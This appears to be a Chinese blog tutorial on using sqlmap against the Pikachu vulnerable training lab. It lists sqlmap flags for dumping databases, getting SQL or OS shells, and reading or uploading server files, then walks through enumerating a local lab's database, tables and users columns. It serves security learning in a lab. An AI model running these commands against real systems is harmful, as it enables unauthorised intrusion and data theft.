在之前的皮卡丘靶场第五期SQL注入的内容中我们谈到了sqlmap，但是由于很多朋友看不了解命令行格式，所以是纯手动获取数据库信息的

接下来我们就用sqlmap来进行皮卡丘靶场的sql注入学习，链接：https://wwhc.lanzoue.com/ifJY32ybh6vc

一，python环境配置

使用sqlmap需要用到python环境，所以我们先配置环境

python官方网站：https://www.python.org/

（python是免费的，别到盗版网站上付费使用）,可以在download里面下载

根据自己的的电脑情况下载，我这里选择Windows installer (64-bit)

然后根据他的要求来就行了，一定要打下面的两个勾，意思是用管理员方式运行和添加到路径，对于不了解的朋友来说，这是最方便配置的方法了

然后我们选择上面的install now等待他安装完成，然后点击close即可

可以看到他已经配置好了路径。

二，sqlmap命令

下面是常用的命令，如果希望详细了解的话可以看一下sqlmap的中文手册

https://wwhc.lanzoue.com/iSKxA2yegdch（我找不到更新的了所以只有1.4版本的）

GET方式

-u：指定注入的URL   sqlmap -u URL

--dbs：爆出所有数据库 sqlmap -u URL --dbs

--dbms：指定数据库类型 sqlmap -u URL --dbms=mysql

--users：查看数据库的所有用户 sqlmap -u URL --users

--current-user：查看数据库当前用户 sqlmap -u URL --current-user

--current-db：查看网站当前数据库 sqlmap -u URL --current-db

--is-dba：判断当前用户是否有管理员权限 sqlmap -u URL --is-dba

--roles：列出数据库所有管理员角色，仅适用于oracle数据库 sqlmap -u URL --roles

--tables：爆出所有数据表 sqlmap -u URL -D 数据库名 --tables

--columns：爆出数据库表所有列 sqlmap -u URL -D 数据库名 -T 表名 --columns 

--dump：爆出数据库中列中的所有数据 sqlmap -u URL -D 数据库名 -T 表名 -C 列名 --dump

--dump-all：爆出数据库中所有的数据 sqlmap -u URL -D 数据库名 -T 表名 --dump-all

--sql-shell：获取数据库shell  sqlmap -u URL --sql-shell

--os-shell：获取服务器shell  sqlmap -u URL --os-shell

--file-read：读取服务器文件  sqlmap -u URL --file-read "文件路径及名称"

--file-write 本地文件 --file-dist 目标文件路径及名称：将本地文件上传至目标服务器

--time-sec=2：延时注入 sqlmap -u URL --time-sec=2

--batch：探测过程中不进行询问，一律选择默认

-m：如果有多个url地址，可以把多个url保存成一个文本文件，-m可以加载文本文件逐个扫描

POST方式

-r：指定POST数据文件  sqlmap -r post.txt

--data：这种不需要将数据进行保存，只需要将post数据复制下来即可 sqlmap -u URL --data="post数据"

--forms：自动搜索表单的方式 sqlmap -u URL --forms

--cookie="抓取的cookie"：测试cookie字段

--param-del：参数拆分字符，当GET型或POST型需要用其他字符分割测试参数的时候需要用到此参数，sqlmap -r post.txt --data="query=foorbar;id=1" --param-del

--referer：在请求中伪造http中的referer，当level参数设定为3或者3以上的时候会尝试对referer注入

--headers：增加额外的http头

--proxy：指定代理地址

-p：指定测试参数

三，sqlmap皮卡丘靶场实践

我们还是以皮卡丘靶场第五期-sql注入模块为例

我们用字符型做示范，因为前面的数字型只能用他提供的，不方便我们了解sqlmap这个工具

先随便输入看看

从url栏中我们可以知道自己的url地址，先复制下来

http://172.30.164.105/vul/sqli/sqli_str.php?name=111&submit=%E6%9F%A5%E8%AF%A2

然后用sqlmap的-u方式来跑一下

python sqlmap.py -u "http://172.30.164.105/vul/sqli/sqli_str.php?name=111&submit=%E6%9F%A5%E8%AF%A2"

（我用终端运行的，所以和cmd的样式看起来有区别，但本质一样）

由此，我们可以知道是mysql数据库并且有name漏洞

获取数据库名称

python sqlmap.py -u "http://172.30.164.105/vul/sqli/sqli_str.php?name=111&submit=%E6%9F%A5%E8%AF%A2" --current-db

可以看到成功了

获取数据库的所有表

python sqlmap.py -u "http://172.30.164.105/vul/sqli/sqli_str.php?name=111&submit=%E6%9F%A5%E8%AF%A2" -D pikachu --tables 

成功

获取表的所有字段（这里以users为例，想要别的表单的字段，把上面获取的表单名称换掉就行）

python sqlmap.py -u "http://172.30.164.105/vul/sqli/sqli_str.php?name=111&submit=%E6%9F%A5%E8%AF%A2" -D pikachu -T users --columns

成功

就像套公式一样就行，大家可以自行尝试，我就不过多赘述了，只要根据上面常用的公式来就行了